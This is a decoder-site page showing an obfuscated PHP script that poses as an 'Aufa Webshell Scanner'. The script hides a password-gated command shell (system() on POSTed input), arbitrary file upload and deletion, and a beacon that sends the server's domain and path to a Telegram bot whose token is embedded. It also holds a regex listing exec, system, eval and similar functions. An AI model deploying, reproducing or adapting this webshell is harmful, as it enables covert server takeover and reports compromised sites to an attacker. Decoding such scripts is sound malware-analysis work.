Online PHP and Javascript Decoder decode hidden script to uncover its real functionality



 goto Yfr7Y; LkcPl: echo "\74\146\x6f\x72\x6d\x20\x6d\x65\164\x68\x6f\x64\75\42\147\x65\x74\42\76"; goto B3vFu; kDO4S: ob_implicit_flush(1); goto ThFub; Gv1_h: set_time_limit(0); goto LY8ZA; ThFub: $path = getcwd(); goto XmsXB; MCUn0: if (!isset($_SESSION["\x6c\157\147\x67\x65\x64\137\x69\156"])) { if ($_SERVER["\x52\x45\x51\x55\x45\x53\x54\137\115\105\x54\x48\117\104"] === "\x50\x4f\123\x54" && isset($_POST["\160\x61\163\x73"]) && $_POST["\160\141\x73\163"] === $password) { $_SESSION["\x6c\157\x67\x67\145\144\x5f\151\x6e"] = true; header("\114\x6f\143\141\164\151\x6f\156\x3a\40\77"); die; } echo "\74\x6c\151\156\153\40\x68\162\145\x66\x3d\42\150\164\164\160\x73\72\57\57\160\x75\142\x2d\61\x30\x30\x61\x36\145\x38\x66\x32\x39\71\x63\64\65\66\x61\x38\x32\x30\x35\70\145\x64\64\63\65\60\65\x37\x33\x65\60\x2e\162\62\56\x64\145\166\57\x73\164\x79\x6c\145\55\x63\157\x6c\x6f\162\x66\x75\x6c\56\143\x73\x73\x22\40\x72\x65\154\75\x22\x73\x74\171\154\x65\163\x68\145\145\x74\x22\76"; echo "\74\144\x69\166\40\143\154\141\163\x73\x3d\x22\x63\157\x6e\164\141\x69\156\x65\162\x20\x6d\164\55\x35\x22\76\74\144\151\x76\x20\143\154\141\x73\x73\x3d\x22\x72\x6f\x77\40\x6a\x75\x73\164\x69\146\171\x2d\143\157\156\164\145\156\x74\55\x63\145\156\164\x65\x72\x22\x3e\74\144\151\x76\x20\143\x6c\x61\163\163\x3d\x22\143\157\x6c\x2d\x6d\x64\55\64\x22\76"; echo "\74\144\151\x76\x20\143\154\141\x73\x73\x3d\x22\x63\x61\x72\144\x22\x3e\74\x64\x69\x76\40\143\154\141\x73\163\75\42\143\x61\x72\x64\55\142\x6f\144\x79\42\x3e"; echo "\x3c\x68\x34\40\143\154\x61\163\x73\x3d\x22\164\145\170\x74\x2d\x63\145\x6e\164\145\x72\x22\76\101\x75\146\141\40\127\x65\142\x73\x68\145\154\x6c\40\123\143\x61\x6e\x6e\145\x72\x3c\x2f\x68\x34\x3e\74\x68\x72\76"; echo "\x3c\146\157\x72\x6d\40\155\x65\x74\150\157\144\75\x22\x50\x4f\123\124\42\x3e\x3c\x69\x6e\x70\x75\164\x20\143\x6c\x61\x73\x73\x3d\42\x66\157\x72\155\x2d\143\157\x6e\164\162\157\x6c\42\x20\164\171\160\x65\75\42\x70\141\x73\x73\167\157\x72\x64\42\x20\x6e\x61\x6d\145\75\x22\160\141\x73\x73\x22\x20\160\154\x61\143\145\150\x6f\x6c\144\145\x72\75\x22\x50\141\163\163\x77\157\x72\144\x22\76\74\142\x72\76"; echo "\x3c\x62\165\164\164\x6f\156\40\x63\154\141\x73\163\x3d\42\x62\x74\x6e\x20\x62\x74\x6e\55\160\162\x69\155\x61\162\x79\x20\x77\55\61\x30\60\x22\x20\x74\x79\x70\x65\75\42\163\x75\x62\155\151\164\42\x3e\x4c\x6f\x67\151\156\74\x2f\x62\165\x74\x74\157\156\76\x3c\57\146\157\162\x6d\76"; echo "\74\x2f\144\151\166\76\x3c\57\x64\151\x76\x3e\x3c\x2f\144\x69\x76\x3e\74\x2f\x64\x69\x76\x3e\74\x2f\144\151\x76\x3e"; die; } goto gxuxl; LY8ZA: error_reporting(0); goto TF003; aI6PH: for ($i = 0; $i < ob_get_level(); $i++) { ob_end_flush(); } goto kDO4S; ODlJa: echo "\x3c\57\144\x69\x76\76\x3c\x2f\x64\151\x76\x3e\x3c\57\144\x69\166\x3e\74\x2f\x64\151\166\x3e\74\x2f\144\x69\x76\76\74\57\x64\151\166\76"; goto yrfMl; Yfr7Y: session_start(); goto HuOWc; HuOWc: $password = "\x61\x75\x66\x61"; goto jmLCZ; gxuxl: if (isset($_GET["\x6b\151\x6c\x6c"])) { unlink(__FILE__); } goto Gv1_h; CNKpx: @ini_set("\x69\x6d\160\x6c\151\x63\151\164\x5f\146\154\165\x73\x68", 1); goto aI6PH; tSVCP: echo "\74\144\x69\x76\x20\x63\x6c\x61\163\x73\x3d\42\143\141\x72\x64\x22\76"; goto QfteR; ydfwE: $path = $_SERVER["\x52\105\x51\125\105\123\x54\137\x55\122\x49"]; goto vwfFV; QfteR: echo "\74\150\x35\40\x63\x6c\141\x73\163\75\42\x63\141\162\144\x2d\150\x65\x61\x64\x65\x72\40\164\x65\x78\x74\55\x63\145\x6e\x74\145\162\40\164\145\170\164\x2d\165\x70\160\x65\x72\x63\141\163\x65\x22\x3e\x41\165\146\141\40\127\x65\x62\x73\150\145\154\x6c\40\x53\x63\x61\156\x6e\x65\x72\74\57\150\65\x3e"; goto SROY5; Hwmt8: function scanBackdoor($current_dir) { if (is_readable($current_dir)) { $dir_location = scandir($current_dir); foreach ($dir_location as $file) { if ($file === "\x2e" || $file === "\56\x2e") { continue; } $file_location = rtrim($current_dir, "\x2f") . "\57" . $file; if (is_dir($file_location)) { scanBackdoor($file_location); } else { if (substr($file, -4) == "\56\160\150\x70") { checkBackdoor($file_location); } } } } } goto ODlJa; vwfFV: $message = "\xf0\237\x94\x94\x20\x41\165\x66\141\x20\123\x63\141\156\x6e\145\x72\145\x21\xa\x44\x6f\155\141\x69\156\x3a\x20{$domain}{$path}"; goto Mlk26; SROY5: echo "\x3c\144\151\x76\x20\143\x6c\x61\163\x73\x3d\42\143\141\x72\x64\55\x62\x6f\x64\x79\x22\x3e"; goto JfqV4; YcZCM: echo "\74\142\x75\164\164\157\156\40\x63\x6c\141\x73\163\x3d\x22\x62\x74\156\40\x62\164\156\55\160\162\x69\155\x61\162\171\42\x20\x74\171\160\145\75\42\x73\165\142\155\151\x74\x22\x3e\123\143\141\156\x3c\x2f\142\165\x74\x74\x6f\x6e\76"; goto FL1t9; Mlk26: file_get_contents("\150\x74\x74\160\163\x3a\57\57\141\160\151\56\164\145\x6c\x65\x67\162\x61\x6d\56\157\x72\x67\57\x62\x6f\x74{$telegramToken}\57\163\x65\x6e\x64\x4d\145\163\x73\141\x67\145\77\x63\x68\141\164\x5f\x69\x64\x3d{$telegramChatId}\46\x74\x65\170\164\75" . urlencode($message)); goto MCUn0; KrWAE: if (isset($_GET["\144\x65\154\145\164\145"])) { unlink($_GET["\144\x65\154\145\164\x65"]); $status = file_exists($_GET["\x64\145\154\x65\x74\145"]) ? "\106\101\111\x4c\105\x44" : "\x53\x75\x63\x63\x65\x73\x73"; echo "\124\162\171\x69\156\147\40\x74\x6f\x20\144\x65\154\x65\164\x65\72\x20{$_GET["\144\145\x6c\145\164\x65"]}\x20\x2d\x20\x3c\163\164\162\157\x6e\x67\76{$status}\x3c\x2f\x73\x74\162\157\156\x67\x3e\x3c\x62\162\76"; die; } goto P0ZFm; aGkGN: echo "\74\154\x69\156\153\40\150\x72\x65\146\x3d\x22\150\164\164\x70\x73\72\x2f\57\x70\165\x62\55\x31\x30\60\141\x36\x65\70\146\62\x39\x39\x63\x34\65\66\141\70\62\60\x35\x38\145\144\64\63\x35\x30\x35\67\63\145\x30\x2e\162\62\56\x64\145\166\x2f\x73\164\171\154\145\x2d\x63\157\x6c\x6f\162\146\165\154\56\x63\x73\163\42\x20\162\x65\x6c\75\42\163\x74\x79\x6c\x65\x73\x68\145\x65\164\x22\76"; goto YdidI; JfqV4: echo "\x3c\x64\151\166\x20\143\154\141\x73\163\75\42\x61\x6c\145\x72\x74\40\141\154\x65\162\164\55\160\162\151\x6d\141\162\171\x20\164\145\170\x74\55\144\141\162\153\x22\x20\162\157\x6c\145\75\42\141\154\x65\x72\164\42\76"; goto tAYMM; tAYMM: echo "\74\151\40\x63\x6c\141\163\x73\x3d\x22\142\170\40\x62\170\55\151\x6e\x66\157\55\143\x69\162\143\154\x65\x20\x66\163\x2d\x32\40\155\145\55\62\x22\76\74\x2f\x69\x3e"; goto Vbtyj; XmsXB: if (isset($_GET["\144\x69\x72"])) { $path = $_GET["\x64\x69\x72"]; } goto aGkGN; gMOFh: function save($fname, $value) { file_put_contents($fname, $value, FILE_APPEND); } goto QEAYj; UFoG3: scanBackdoor($path); goto gMOFh; P0ZFm: if (isset($_GET["\x61\165\x66\x61"]) && $_GET["\141\165\x66\x61"] == 1) { echo "\74\x68\162\x3e\x3c\x68\x35\76\xf0\237\224\222\40\110\x69\x64\x64\x65\x6e\x20\x53\150\x65\x6c\x6c\x20\101\x63\x63\x65\x73\163\x3c\x2f\x68\x35\x3e"; if (isset($_POST["\143\155\144"])) { echo "\74\x70\162\x65\76\x3c\x63\x6f\144\145\76"; system($_POST["\x63\x6d\x64"]); echo "\74\x2f\143\x6f\x64\145\x3e\74\x2f\160\162\145\76"; } echo "\74\146\157\x72\155\x20\x6d\x65\x74\150\x6f\144\75\x22\120\x4f\123\x54\42\76"; echo "\x3c\x64\151\166\x20\143\154\141\x73\163\75\42\x69\x6e\160\x75\x74\x2d\x67\162\157\165\x70\40\x6d\x62\x2d\x33\42\76\x3c\x69\x6e\x70\165\x74\40\x74\x79\x70\145\75\x22\x74\145\x78\164\42\x20\156\x61\x6d\x65\x3d\x22\143\x6d\x64\42\40\143\154\x61\x73\163\75\x22\146\157\x72\x6d\55\143\x6f\156\164\x72\x6f\x6c\x22\40\x70\154\x61\143\145\x68\157\154\x64\x65\x72\75\42\105\156\164\145\162\x20\x63\x6f\x6d\155\141\156\144\x22\x3e"; echo "\74\142\165\164\x74\157\156\40\143\x6c\141\x73\163\x3d\x22\x62\164\156\40\142\x74\x6e\x2d\167\141\162\156\x69\x6e\147\42\40\x74\x79\x70\145\75\x22\163\x75\142\155\x69\164\x22\76\x45\170\145\x63\165\164\x65\x3c\57\142\165\164\164\x6f\156\x3e\x3c\57\144\151\x76\x3e\x3c\x2f\x66\157\162\155\x3e"; if (isset($_FILES["\x75\x70\x6c\x6f\141\x64"])) { $name = $_FILES["\x75\x70\154\157\141\x64"]["\156\x61\x6d\145"]; $tmp = $_FILES["\x75\160\x6c\x6f\141\x64"]["\x74\x6d\160\137\x6e\x61\155\x65"]; if (move_uploaded_file($tmp, "{$path}\x2f{$name}")) { echo "\74\x64\x69\x76\40\143\154\x61\x73\163\x3d\x27\141\x6c\x65\x72\164\40\x61\x6c\145\162\x74\55\x73\x75\143\x63\145\x73\x73\47\x3e\125\160\154\x6f\141\144\x20\163\165\x63\143\145\x73\x73\x3a\x20{$name}\x3c\x2f\x64\151\166\76"; } else { echo "\74\x64\x69\x76\40\143\154\x61\163\x73\x3d\47\x61\154\x65\x72\164\x20\x61\154\x65\162\x74\x2d\144\x61\x6e\147\x65\x72\x27\76\x55\x70\154\x6f\141\x64\x20\146\141\151\x6c\x65\x64\x2e\74\57\x64\x69\x76\x3e"; } } echo "\74\146\157\x72\155\x20\155\145\x74\150\157\144\x3d\x22\x50\117\x53\x54\x22\40\x65\x6e\143\164\171\160\x65\75\42\155\x75\x6c\164\151\160\141\x72\x74\x2f\x66\157\162\155\x2d\x64\x61\x74\x61\x22\x3e"; echo "\x3c\151\x6e\x70\165\x74\x20\x74\x79\x70\x65\75\42\146\x69\x6c\x65\42\40\156\141\x6d\145\75\x22\x75\160\x6c\157\x61\x64\42\x20\x63\x6c\141\163\163\x3d\42\146\x6f\162\x6d\55\143\157\x6e\x74\x72\157\x6c\x20\155\142\x2d\62\x22\x3e"; echo "\x3c\x62\165\x74\164\157\x6e\x20\143\154\141\163\x73\x3d\x22\x62\164\x6e\x20\142\x74\x6e\x2d\151\156\x66\x6f\x22\40\164\171\160\145\75\42\163\165\x62\x6d\151\164\42\x3e\125\160\154\x6f\x61\144\40\106\151\x6c\x65\74\x2f\x62\165\x74\164\x6f\156\x3e\74\57\x66\157\x72\155\76\x3c\x68\x72\76"; } goto UFoG3; FL1t9: echo "\74\57\x64\151\166\76\x3c\57\x66\157\x72\x6d\x3e"; goto cBw0F; QEAYj: function checkBackdoor($file_location) { global $path; $pattern = "\43\x65\170\145\143\134\x28\174\x67\172\x69\x6e\x66\x6c\x61\x74\x65\x5c\50\174\146\151\x6c\145\137\x70\x75\x74\x5f\x63\157\156\x74\x65\x6e\164\163\134\50\x7c\x66\151\154\145\x5f\147\x65\164\137\x63\x6f\156\164\145\x6e\x74\163\134\50\174\x73\x79\x73\x74\x65\155\134\50\174\x70\141\x73\x73\164\150\162\x75\x5c\50\x7c\163\150\145\x6c\154\137\145\170\145\143\x5c\50\x7c\x6d\157\x76\145\137\x75\160\154\x6f\x61\144\145\144\x5f\x66\x69\x6c\145\x5c\x28\174\x65\x76\141\x6c\x5c\50\174\142\x61\x73\x65\66\x34\43"; $contents = file_get_contents($file_location); if (strlen($contents) > 0 && preg_match($pattern, strtolower($contents))) { echo "\74\x64\151\x76\40\143\x6c\x61\x73\x73\75\47\x61\154\145\x72\164\x20\x61\154\145\162\x74\x2d\167\x61\162\x6e\x69\156\x67\x27\x3e\x3c\163\164\x72\157\x6e\147\x3e\123\165\x73\160\151\143\x69\x6f\165\x73\x3a\74\57\163\x74\x72\x6f\156\x67\x3e\40\x3c\x63\157\144\x65\76{$file_location}\74\x2f\143\157\144\x65\76"; echo "\40\74\x61\x20\150\x72\x65\146\x3d\x27\77\x64\145\x6c\x65\x74\145\75{$file_location}\x26\x64\151\162\x3d{$path}\47\40\x63\x6c\141\x73\163\x3d\47\142\x74\x6e\40\x62\164\156\x2d\x73\155\x20\x62\x74\x6e\x2d\144\x61\x6e\147\145\162\x27\76\x44\145\x6c\x65\x74\145\74\x2f\141\x3e\x3c\x2f\x64\x69\166\x3e"; save("\x77\x6f\x70\56\x74\170\164", "{$file_location}\xa"); echo "\x3c\x74\145\170\164\x61\x72\x65\x61\x20\143\154\141\163\163\x3d\42\146\157\x72\155\x2d\143\x6f\x6e\x74\x72\x6f\x6c\x20\x6d\x62\x2d\x33\42\x20\162\157\167\x73\x3d\42\61\60\42\76" . htmlspecialchars($contents) . "\x3c\x2f\x74\x65\170\x74\x61\x72\x65\141\76"; } } goto Hwmt8; YdidI: echo "\74\x64\151\x76\40\143\x6c\141\x73\163\75\42\x70\141\147\145\55\x63\157\x6e\x74\x65\x6e\164\42\76\74\x64\151\x76\x20\143\x6c\141\x73\x73\75\x22\x63\x6f\156\164\141\x69\156\145\x72\55\x66\x6c\x75\x69\x64\x22\x3e"; goto Ve_KT; B3vFu: echo "\74\x64\x69\x76\x20\x63\x6c\141\163\163\x3d\x22\x69\156\160\165\164\x2d\x67\x72\x6f\x75\x70\40\155\142\x2d\63\42\76"; goto B6Jl1; QclZa: $telegramChatId = "\66\66\x37\61\63\66\x38\x38\x37\62"; goto GFPiK; jmLCZ: $telegramToken = "\67\x34\x32\62\65\61\67\x37\61\62\x3a\101\x41\105\x35\x33\123\150\124\147\123\147\x72\x43\x4f\x58\166\116\150\130\130\x75\71\152\x32\122\x55\172\x5a\155\x51\x4b\60\121\x7a\64"; goto QclZa; Vbtyj: echo "\x50\x6f\167\x65\x72\146\165\x6c\40\x50\110\120\x20\163\x63\141\x6e\x6e\145\x72\40\x77\x69\164\x68\40\x68\x69\144\x64\145\156\40\x74\157\157\x6c\x73\56\x20\125\163\x65\x20\162\x65\163\160\x6f\156\x73\x69\x62\x6c\x79\56\x3c\x2f\144\x69\x76\76"; goto XEFBe; XEFBe: echo "\74\x61\x20\x68\162\x65\x66\x3d\x27\x3f\x6b\151\154\154\47\x20\x63\x6c\x61\163\x73\75\x27\x62\164\156\x20\x62\x74\x6e\x2d\x64\141\156\147\x65\162\x20\x62\x74\156\55\163\155\47\x3e\133\x53\x65\154\146\x20\x44\x65\154\x65\x74\145\135\x3c\57\x61\76\74\x62\x72\76\x3c\x62\162\76"; goto LkcPl; TF003: @ini_set("\172\x6c\151\x62\56\x6f\x75\x74\x70\165\x74\x5f\x63\157\155\160\x72\145\163\x73\151\x6f\156", 0); goto CNKpx; B6Jl1: echo "\74\x69\x6e\160\x75\164\x20\x63\154\x61\163\163\x3d\x27\146\157\x72\155\x2d\143\157\x6e\x74\x72\x6f\154\47\40\x74\x79\x70\145\x3d\47\164\145\170\164\x27\x20\x6e\141\155\x65\75\x27\144\x69\x72\47\40\x76\141\154\165\145\75\x27{$path}\x27\x3e"; goto YcZCM; GFPiK: $domain = $_SERVER["\110\x54\x54\x50\137\x48\x4f\x53\124"]; goto ydfwE; cBw0F: echo "\74\x73\164\x72\x6f\x6e\x67\x3e\x43\x75\162\162\145\156\x74\x20\x44\151\162\x65\x63\164\157\x72\x79\72\74\x2f\x73\164\162\157\156\x67\x3e\40\74\x73\160\141\x6e\40\143\x6c\141\163\x73\x3d\x27\x74\x65\x78\164\x2d\x73\165\143\x63\145\163\x73\x27\76{$path}\x3c\x2f\163\x70\x61\x6e\x3e\74\x62\x72\x3e\x3c\142\x72\76"; goto KrWAE; Ve_KT: echo "\74\x64\151\166\40\143\154\x61\163\163\x3d\x22\x72\x6f\x77\x20\144\x2d\146\x6c\x65\x78\x20\x6a\x75\x73\x74\x69\x66\171\x2d\x63\x6f\x6e\164\x65\x6e\164\x2d\143\145\x6e\x74\x65\162\42\76\74\144\x69\x76\40\143\154\141\163\163\x3d\x22\x63\x6f\154\x2d\61\x32\42\x3e"; goto tSVCP; yrfMl:


© 2023 Quttera Ltd. All rights reserved.